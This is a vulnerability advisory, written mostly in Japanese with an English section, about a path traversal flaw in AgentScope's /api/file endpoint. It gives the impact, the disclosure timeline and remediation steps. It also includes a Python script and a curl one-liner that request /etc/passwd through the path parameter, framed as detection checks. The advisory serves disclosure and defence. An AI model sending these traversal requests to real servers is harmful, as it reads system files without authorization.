AgentScope におけるパス・トラバーサル /api/file

このパス・トラバーサル脆弱性は、攻撃者が/api/fileエンドポイントのpathパラメータを操作することで、サーバーのファイルシステムを自由に探索することを可能にします。攻撃者は、設定ファイル、ソースコード、機密データなど、サーバー上に存在する任意のファイルを読み取ることができます。これにより、システム全体の機密性、完全性、可用性が脅かされる可能性があります。攻撃者は、この脆弱性を利用して、システムへのさらなるアクセス権を取得したり、他のシステムへの攻撃の足がかりにしたりする可能性があります。

Organizations deploying Agentscope in production environments, particularly those with sensitive data stored on the same server, are at risk. Environments with weak access controls or inadequate input validation practices are especially vulnerable. Shared hosting environments where Agentscope is installed alongside other applications could also be affected if the vulnerability is exploited to gain access to other tenants' data.

• python / agentscope:

import requests
import os

url = 'http://your-agentscope-server/api/file' # Replace with your server

try:
    # Attempt to read a sensitive file
    response = requests.get(url + '?path=/etc/passwd')
    if response.status_code == 200:
        print('Potential Path Traversal Detected!')
        print(response.text)
    else:
        print('No Path Traversal Detected.')
except requests.exceptions.RequestException as e:
    print(f'Error: {e}')

• generic web:

curl 'http://your-agentscope-server/api/file?path=../../../../etc/passwd' -s | grep 'root:'

1. 2025-03-20Disclosure

   disclosure

1. 予約済み2024-09-04
2. 公開日2025-03-20
3. EPSS 更新日2026-04-02

この脆弱性への主な対策は、Agentscopeのバージョンを0.0.5以降にアップデートすることです。アップデートが困難な場合は、/api/fileエンドポイントへのすべてのリクエストに対して、厳格な入力検証を実装する必要があります。具体的には、pathパラメータに含まれる文字列をホワイトリストで検証し、不正な文字やディレクトリトラバーサルシーケンス（例：../）を排除してください。WAF（Web Application Firewall）を導入し、パス・トラバーサル攻撃を検知・ブロックすることも有効です。